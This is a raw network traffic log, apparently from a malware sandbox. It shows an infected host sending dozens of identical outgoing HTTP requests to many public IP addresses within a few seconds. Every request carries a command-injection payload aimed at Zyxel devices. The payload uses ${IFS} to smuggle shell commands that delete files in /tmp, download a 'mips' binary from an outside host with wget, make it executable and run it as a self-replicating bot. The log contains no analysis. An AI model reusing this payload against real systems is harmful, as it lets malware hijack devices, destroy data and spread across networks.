                                        Mar 31, 2024 09:20:18.121047020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        389192.168.2.233392819.201.138.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121082067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        390192.168.2.2343484223.158.145.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121121883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        391192.168.2.2337134137.61.65.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121170044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        392192.168.2.234269288.115.14.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121208906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        393192.168.2.235276817.132.226.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121298075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        394192.168.2.233463673.73.123.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121335030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        395192.168.2.2338398210.21.70.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121373892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        396192.168.2.235151678.51.110.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121414900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        397192.168.2.234841099.230.215.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121450901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        398192.168.2.2348658144.205.43.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121500969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        399192.168.2.2354566208.225.132.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121548891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        400192.168.2.23410849.191.49.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121583939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        401192.168.2.2355288209.164.3.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121627092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        402192.168.2.2333064162.159.226.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121663094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        403192.168.2.2356500139.34.66.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121695995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        404192.168.2.2356214178.54.75.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121752977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        405192.168.2.2337020142.194.63.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121808052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        406192.168.2.236007259.87.185.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121855974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        407192.168.2.235363866.205.71.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.121942043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        408192.168.2.2352568202.59.206.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.122004986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        409192.168.2.2334876202.47.85.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.122056007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        410192.168.2.2339076151.26.207.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.122118950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        411192.168.2.235864631.224.170.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:18.122170925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        412192.168.2.2360256190.128.36.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129384995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        413192.168.2.2345304206.35.75.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129422903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        414192.168.2.2351632152.248.126.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129509926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        415192.168.2.2337710201.224.116.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129569054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        416192.168.2.235733071.233.135.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129630089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        417192.168.2.234254052.193.235.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129725933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        418192.168.2.234037812.67.242.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:19.129964113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        419192.168.2.235307896.203.47.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142050982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        420192.168.2.236029473.50.91.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142103910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        421192.168.2.234671861.109.78.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142127037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        422192.168.2.2339296116.146.97.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142194033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        423192.168.2.23380308.6.110.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142235994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        424192.168.2.2346030109.220.204.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142275095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        425192.168.2.234665286.244.193.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142319918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        426192.168.2.233437693.106.135.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142364979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        427192.168.2.2360686169.104.72.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142394066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        428192.168.2.235983847.108.149.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142429113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        429192.168.2.2358454153.228.142.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142467976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        430192.168.2.2359688114.111.87.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142523050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        431192.168.2.2342450174.16.1.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142575026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        432192.168.2.2340464206.67.16.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142611027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        433192.168.2.2333066119.201.230.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142644882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        434192.168.2.2359684219.161.220.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142683029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        435192.168.2.234078845.244.181.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142719030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        436192.168.2.233736490.86.213.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142762899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        437192.168.2.2358124132.27.27.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142819881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        438192.168.2.235276413.254.114.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142878056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        439192.168.2.2358932188.139.79.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142911911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        440192.168.2.2349524114.33.102.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.142986059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        441192.168.2.2356016165.148.144.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143024921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        442192.168.2.2342954194.144.50.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143074989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        443192.168.2.234175242.169.22.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143110037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        444192.168.2.2333322219.146.145.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143161058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        445192.168.2.234762868.150.166.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143203020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        446192.168.2.2341636152.17.216.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143251896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        447192.168.2.2337190123.249.27.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143307924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        448192.168.2.2349038220.106.181.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143351078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        449192.168.2.234484231.43.201.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143399000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        450192.168.2.233286282.138.192.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143456936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        451192.168.2.2338956195.23.64.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143501043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        452192.168.2.2341074150.110.121.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143537998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        453192.168.2.2360736124.87.189.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143599033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        454192.168.2.2334228155.167.42.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143630028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        455192.168.2.2351492189.248.88.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143682957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        456192.168.2.2357118139.43.81.224443
                                        TimestampBytes transferredDirectionData
